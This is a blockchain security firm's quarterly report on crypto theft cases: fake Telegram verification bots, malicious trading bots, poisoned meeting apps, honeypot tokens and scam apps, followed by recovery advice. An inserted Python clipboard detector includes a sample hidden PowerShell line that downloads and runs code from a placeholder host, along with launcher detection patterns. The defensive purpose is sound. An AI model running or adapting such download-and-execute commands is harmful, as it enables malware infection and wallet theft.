SlowMist: 2025 Q1 MistTrack Stolen Funds Analysis
Author: Lisa
Editor: Sherry
Since 2024, SlowMist has published a series of stolen-funds form analyses, in which we statistically review and analyze the stolen-funds forms received each quarter. The series dissects common and rare malicious tactics using anonymized real-world cases. This year we continue the series with the goal of helping industry participants better understand and prevent security risks, and protect their assets.
According to statistics, the MistTrack Team received 5,830 stolen forms in Q1 of 2025, including 417 domestic forms and 5,413 international forms. We provided free evaluation services for these forms in our community. (Note: The content of this article only refers to cases submitted via the forms, excluding those submitted via email or other channels.)
In Q1, the MistTrack Team assisted 13 stolen clients in successfully freezing approximately $2.61 million in funds across 7 platforms.
Causes of Theft
In Q1 of 2025, private key leakage became the top cause of theft. Let’s take a closer look at the specific situation:
Fake Safeguard Verification
These scams mainly come in two types. One involves stealing Telegram accounts, where scammers lure users into entering their phone numbers, verification codes, or even Two-Step Verification passwords to steal their Telegram accounts. The other method involves planting trojans on the user’s computer, which has been a more common tactic recently.
Scammers often create fake X accounts impersonating KOLs and post Telegram links in the comment section, inviting users to join “exclusive” Telegram groups for investment information. Once users enter the Telegram channel, they are guided through a verification process. After clicking “Tap to verify,” a fake Safeguard bot appears, showing that verification is in progress. The verification window lasts only for a very short time, creating a sense of urgency that forces users to proceed with the operation.
As the user keeps clicking, the window pretends that verification has failed. Eventually a prompt appears instructing the user to complete the verification manually.
The scammer has carefully laid out Step 1, Step 2 and Step 3. By this point the user’s clipboard already contains malicious code. If the user follows the guide, opens the command prompt and pastes with Ctrl + V, the result looks like the image below: the full content is not visible in the command prompt, because a large blank area precedes the word “Telegram” and the malicious code. The malicious code is typically a PowerShell command. Once executed, it silently downloads more complex malware and ultimately infects the computer with a remote-access trojan (such as Remcos). Once the computer is compromised, the attackers can remotely steal sensitive information such as wallet files, mnemonic phrases, private keys and passwords, leading to asset theft.
If you open it on your mobile phone, the scammer will gradually gain access to your Telegram permissions:
If you are using a Mac rather than a Windows computer, there are similar methods to get your computer infected. The trick is much the same; if you are interested, you can read about the new tactics in the article “New Scam Technique | Fake Safeguard Scam on Telegram.”
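The padded clipboard command described above lends itself to a simple defensive check. The following is an added example, not code from SlowMist or the report: a Python heuristic that flags pasted text combining a long blank run with PowerShell launcher indicators, and collapses the whitespace so the hidden part becomes visible. The sample clipboard contents are constructed, with a reserved .invalid placeholder URL.

```python
import re

# Constructed sample clipboard contents (not real payloads). SAMPLE_PADDED mimics the
# layout the report describes: a long blank run, the word "Telegram", then the command.
SAMPLE_PADDED = (" " * 120 + "Telegram" + " " * 60 +
                 "powershell -WindowStyle Hidden -Command "
                 "\"iex (iwr 'https://stage2.invalid/x')\"")
SAMPLE_BENIGN = "git status"
SAMPLE_PLAIN_PS = "powershell Get-Process"

# Patterns that, in a pasted one-liner, point to a hidden PowerShell launcher pulling
# a second stage. Used purely as detection indicators, matched against lowercased text.
LAUNCHER_INDICATORS = [
    ("powershell launcher", r"\bpowershell(\.exe)?\b|\bpwsh\b"),
    ("hidden window", r"-w(indowstyle)?\s+hidden"),
    ("encoded command", r"-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("remote fetch", r"\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|\bmshta\b"),
]

def analyze_clipboard(text, min_padding=40):
    """Classify clipboard text as 'ok', 'warn' or 'block' and list the reasons."""
    reasons = []
    # Leading whitespace pushes the real command past the right edge of a narrow
    # console window, so the paste appears to be a blank line.
    leading = len(text) - len(text.lstrip(" \t"))
    if leading >= min_padding:
        reasons.append(f"{leading} leading whitespace characters before visible text")
    # A long whitespace run after a harmless-looking label hides whatever follows it.
    if re.search(r"\S[ \t]{%d,}\S" % min_padding, text):
        reasons.append("long whitespace run separating a visible label from the command")
    padded = bool(reasons)
    hits = [name for name, pat in LAUNCHER_INDICATORS if re.search(pat, text.lower())]
    if hits:
        reasons.append("launcher indicators: " + ", ".join(hits))
    # Padding plus a launcher is the signature from the report; a bare PowerShell
    # command may be legitimate, so it only earns a warning.
    verdict = "block" if (padded and hits) else "warn" if hits else "ok"
    return {"verdict": verdict, "reasons": reasons}

def reveal(text):
    """Collapse whitespace runs so the whole pasted line is visible at once."""
    return re.sub(r"[ \t]{2,}", " ", text).strip()

if __name__ == "__main__":
    for sample in (SAMPLE_PADDED, SAMPLE_BENIGN, SAMPLE_PLAIN_PS):
        result = analyze_clipboard(sample)
        print(result["verdict"], result["reasons"], "|", reveal(sample))
```

A paste guard or clipboard monitor can call analyze_clipboard before a console receives the text and show reveal() output to the user when the verdict is "block".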
Malicious Telegram Bot
Recently, several users have reported thefts while using trading bots:
According to the forms, the most common scenario is when a new bot appears at the top of the channel. Believing it to be an official new release, users click on the new bot to import their private key and bind their wallet, ultimately leading to theft. Upon closer inspection, the bot has an “Ad” label (advertisement), which is a built-in advertising prompt from Telegram. Since this malicious trading bot appears in an official channel, users are often subconsciously led to believe it’s an official release. Please be cautious and verify carefully.
In addition, scammers may also pretend to be Telegram officials sending you messages, using scam tactics such as claiming account anomalies or expired logins, and guide you to click on phishing links.
We recommend that users first confirm that their Telegram app was installed from official channels. When using trading bots, be cautious whenever you are asked to enter your private key directly. Additionally, periodically review the bots authorized in your Telegram account for fakes. It is best to choose reputable trading bots, regularly check the security of the trading bot platform, make sure you are using the latest version, and strengthen your private key management practices.
Computer Poisoning
Recently, several users have reported incidents of computer poisoning, with the method still relying on social engineering combined with malware injection. The main techniques used are as follows:
- Impersonation: Attackers often impersonate well-known venture capitalists (VCs) or business partners. They contact the targets via Telegram, LinkedIn, or email, and offer investment or cooperation opportunities.
- Sending Conference Links: Attackers lure the target into joining a “conference” by providing a fake software download link, such as talksy[.]ca.
- Guiding Software Installation: Once the victim downloads and installs the software, the malicious script is triggered.
- Data Theft: The malware steals sensitive data, including system passwords, browser data, and encrypted wallet information. Some variants disguise themselves as macOS security validation requests, prompting the victim to enter their password, granting the malware higher-level permissions.
- Remote Data Upload: Attackers package all the collected information and upload it to a Command and Control (C2) server (controlled by the attackers) through an encrypted channel.
In addition, attackers may steal the victim’s Telegram account and impersonate the victim to send messages to their contacts, inviting them to join a fake video conference, further expanding the scope of the attack. Telegram account theft is still an old tactic, mainly involving tricking victims into sharing their login codes, phishing for QR code login authorizations, or poisoning the computer. If discovered in time, it’s crucial to quickly go to the Telegram settings under Privacy and Security -> Active Sessions -> Terminate All Other Sessions, and then enable or modify Two-Step Verification.
Honeypot Scam
According to the form statistics, scams involving the inducement to purchase a “honeypot coin” have been steadily increasing. In most cases, scammers initiate private conversations with users, gain their trust, and then recommend investing in this coin. Since the coin lacks real market liquidity, investors are unable to sell or exchange it. The scammers will transfer the profits to their own wallet addresses. In some cases, scammers use a Ponzi scheme model, paying early investors with funds from new investors, creating a false impression of the coin’s rise to attract more participants. Once the pool of funds reaches a certain size, the scammers will disappear with the money.
In addition, some scams combine social engineering tactics, such as spreading fake news and manipulating community opinion to create a sense of FOMO (Fear of Missing Out), pressuring users into investing hastily. It is recommended that users use token detection tools like GoPlus to verify related tokens before participating. It is also good practice to review the project’s whitepaper, team information, and other relevant details to avoid investing in any unverified ICOs or emerging tokens. Additionally, always remain cautious and skeptical about any “guaranteed high return” investment opportunities.
Malicious Software BOM
In February, several users reported that their wallet assets had been stolen. After analysis by the SlowMist AML team and OKX Web3 security team, the stolen cases all showed signs of mnemonic phrase/private key leakage. Further follow-up with affected users revealed that many of them had previously installed and used an app called BOM. In-depth investigation confirmed that this app was actually a carefully disguised scam. Cybercriminals used the app to induce users into granting authorization, allowing them to illegally obtain mnemonic phrases/private key access and carry out systematic asset transfers while concealing the theft.
Specifically, after entering the contract page, this malicious app tricks users into granting local file and photo album permissions under the pretext of being necessary for the app’s operation. Once the user grants the permissions, the app scans and collects media files from the device’s photo album in the background, then packages and uploads them to the server. If the user’s files or photo album contain information such as mnemonic phrases or private keys, the attackers may exploit the collected information to steal the user’s wallet assets. For more details, you can read the joint report by OKX & SlowMist: “OKX & SlowMist Joint Report: Bom Malware Hits Tens of Thousands of Users, Stealing Over $1.82 Million.”
RedNote Scam
In Q1, the number of scam cases on RedNote has increased, with significant financial losses reaching over a million dollars. By searching for keywords like “cryptocurrency,” “Bitcoin,” and “exchange” on RedNote, you can see many users sharing their profit/loss experiences, such as “multiplied by X times in one day,” “brave in the crypto world,” and “hundred U battle gods.” In the comment sections, numerous users are asking to be guided, which creates a “fishing pond” for scammers. Scammers bait users in the comment section, claiming to provide exchange installation services. The scam proceeds as expected — once the user takes the first step into Web3, they fall into the scammer’s trap by downloading a fake exchange, resulting in financial losses. Some scammers impersonate so-called “industry experts” or “investment masters,” showcasing fake investment success stories to build “credibility.” Then, they privately message users with supposed cryptocurrency investment opportunities, claiming to have insider information that guarantees profits. They also shift communication to other platforms to continue the scam. We urge users to remain vigilant and not trust others easily to avoid situations where you aim to earn interest, but the other party targets your principal.
Final Thoughts
In the world of blockchain security, attackers are everywhere, and defenders are at constant risk of being targeted due to any lapse in vigilance. Regarding how to handle devices infected with malicious software, we recommend users refer to the advice in the “Blockchain dark forest selfguard handbook”:
If you fall victim to an attack, with the mindset of not relying on luck and following the principle “a wise man does not stand under a dangerous wall,” you should promptly take the following actions:
1. For any wallets in use on your computer (including private key/seed phrase backup files), transfer the funds to a secure address immediately. Don’t assume that having a password for the wallet means it’s safe.
2. For important accounts and passwords, such as Telegram, X, email, trading platform accounts, etc. (including passwords saved in browsers or accounts you’ve logged into), you should change the passwords, update two-factor authentication (2FA), and check if there are any unknown devices logged into these accounts.
3. Install well-known antivirus software, such as AVG, Bitdefender, Kaspersky, Malwarebytes, etc., and thoroughly scan your computer. Choose one that suits you, and if necessary, pay for the premium version. If you’re still concerned, use two different paid ones, switching between them for thorough protection.
4. If you’re still worried, back up important files, then reset your computer. Afterward, return to step 3 and scan the backed-up files with antivirus software.
Just a reminder, these malware attacks target not only Windows but also Mac computers (and in some cases, Linux systems as well).
If you’ve fallen victim to cryptocurrency theft, we offer free community assistance to help evaluate your case. Simply submit the appropriate form based on the incident type (stolen funds, scam, or extortion). The hacker’s address you provide will also be shared with SlowMist InMist Lab’s Threat Intelligence Network for further risk control actions.
- Submit the Chinese form here: https://aml.slowmist.com/cn/recovery-funds.html
- Submit the English form here: https://aml.slowmist.com/recovery-funds.html
SlowMist has been deeply involved in the Anti-Money Laundering (AML) field for many years, developing a comprehensive and efficient solution that covers compliance, investigations, and audits. We are committed to fostering a healthy cryptocurrency ecosystem and providing professional services to the Web3 industry, financial institutions, regulatory bodies, and compliance departments. Our MistTrack platform offers compliance investigation services that include wallet address analysis, fund monitoring, and tracing. To date, MistTrack has accumulated over 300 million address tags, more than 1,000 address entities, 500,000+ threat intelligence data points, and 90 million+ risk addresses, providing strong protection against money laundering and ensuring digital asset security.
About SlowMist
SlowMist is a blockchain security firm established in January 2018. It was founded by a team with over ten years of network security experience and has grown into a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat intelligence, defense deployment, security consulting, and other security-related services. We also offer AML (Anti-Money Laundering) software, MistEye (security monitoring), SlowMist Hacked (crypto hack archives), FireWall.x (smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.